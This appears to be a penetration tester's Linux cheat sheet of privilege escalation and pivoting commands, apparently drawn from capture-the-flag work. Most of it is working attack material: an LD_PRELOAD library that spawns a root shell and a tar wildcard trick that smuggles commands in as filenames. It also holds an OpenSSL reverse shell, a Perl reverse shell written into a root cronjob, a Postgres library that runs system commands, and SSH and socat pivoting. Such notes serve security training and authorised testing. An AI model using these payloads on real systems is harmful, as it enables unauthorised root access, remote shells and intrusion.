Linux Notes

3 minute read

Scripts

General

Get capabilities:

/sbin/getcap -r / 2>/dev/null

Get suid binaries:

find / -perm -u=s -type f 2>/dev/null

Check sudo configuration:

sudo -l
cat /etc/sudoers

Check open files on linux:

fuser <filename>
lsof <filename>

Check for unmounted disks on linux:

ls /dev

Bash port scan:

for p in {1..65535}; do echo hi > /dev/tcp/<ip>/$p && echo port $p is open > scan 2>/dev/null; done 

Using gateway finder to detect rogue gateways:

arp-scan -l | tee <name>.txt
python gateway-finder.py -f arp.txt -i <public ip>

Mount vmdk file:

modprobe nbd
qemu-nbd -r -c /dev/nbd2 <name>.vmdk
mount /dev/nbd1p1 /mnt

Find files by date:

find / -newermt "<start-date>" ! -newermt '<end-date>' 2>/dev/null

Get proper tty on shell:

# stty method
python -c "import pty; pty.spawn('/bin/bash')"
ctrl+z
stty raw -echo
fg
<enter>
<enter>
# rlwrap method
rlwrap <command>

Pivoting

Meterpreter port forwarding (inside session):

portfwd add -l <localport> -p <remoteport> -r <target host>

SSH static port forwarding (single port, execute on attacker):

ssh <user>@<target> -L 127.0.0.1:8888:<targetip>:<targetport>

SSH Dynamic Port Forwarding (execute on attacker):

ssh -D <localport> user@host

SSH Remote forwarding (execute on victim)

ssh -r -R <lport>:<ip>:<rport> user@attacker

Configure proxychains (just change last line):

socks4  <ip> <port>

Use proxychains:

proxychains -f pivot.conf <tool> <params>

SSH Jumphosts (port forwarding through multiple hosts):

ssh -J jumpuser1@jumphost1,jumpuser2@jumphost2,...,jumpuserN@jumphostN user@host

Socat example, redirect connection on 5000 to :5001

./socat tcp-listen:5000,reuseaddr,fork tcp:<target ip>:5001

Function Hijacking

LD_PRELOAD

Check if you can write into the path of privileged binaries, you might be able to abuse the library load order Check wich functions a binary uses via objectdump -T. To use these preload attacks with sudo in /etc/sudoers there must be env_keep += LD_PRELOAD

Preload example payload:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}

Compile preload example payload:

gcc -fPIC -shared -o payload.so payload.c -nostartfiles
sudo LD_PRELOAD=/tmp/payload.so <target>

When playing with the linker configs run ldconfig afterwards or it wont update the linker cache.

Abusing Common Tools

A nice collection of abusable tools can be found at gtfobins.

Abusing Tar

If tar is allowed in sudoers with a wildcard command we can abuse that for privilege escalation. Filenames will be interpreted as command line arguments therefore we can create the following setup:

-rw-r–r–. 1 xxx xxx 0 Oct 28 19:19 –checkpoint=1
-rw-r–r–. 1 xxx xxx 0 Oct 28 19:17 –checkpoint-action=exec=sh payload.sh
-rwxr-xr-x. 1 xxx xxx 12 Oct 28 19:17 payload.sh

To create the files use:

echo "chmod u+s /usr/bin/find" > payload.sh
echo "" > "--checkpoint-action=exec=sh payload.sh"
echo "" > --checkpoint=1

Using find as the payload has the charm that we can execute commands via find f1 -exec "whoami" \; (file f1 must exist)

Abusing TCPDump

With -z you can execute commands via TCPDump.

Abusing OpenSSL

Openssl can read files and write into files via network. So it can be used for exfil and infil of Data. In addition a bind or reverse shell can be implemented via OpenSSL, e.g.:

openssl.exe s_client -quiet -connect <ip>:<port> | cmd.exe | openssl.exe s_client -quiet -connect <ip>:<port>`

Rsync

If permissions allow it one can get RCE with RSync by overwriting the cronjobs file.

* * * * * root perl -e 'use Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};   

Download folder:

rsync -r rsync://user@ip/<remote_dir>/ .

Upload folder:

rsync -vvaP -6 <local dir> "rsync://user@ip/<remote dir>"

Load postgres shared library

sudo apt-get install postgresql-server-dev-11
#include "postgres.h"
#include "fmgr.h"
#include <stdlib.h>

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif


Datum exec(PG_FUNCTION_ARGS){
    system("<cmd>");

};
PG_FUNCTION_INFO_V1(exec);
gcc xct.c -I`pg_config --includedir-server` -fPIC -shared -o xct.so
CREATE OR REPLACE FUNCTION exec()  RETURNS text AS  '/tmp/xct.so', 'exec' LANGUAGE C STRICT;
SELECT exec();

NFS Shares

When mounting nfs-shares with mount <ip>:/<path> <folder> you can impersonate users by running the command with a local user that has the uid you want to use on target box, as it just matches the uids when checking for permissions.

Networking

Show open ports without netstat:

grep -v "rem_address" /proc/net/tcp  | awk  '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
ss

MitM Packet Installation

See notes on OneTwoSeven.

Interesting Reads

Updated: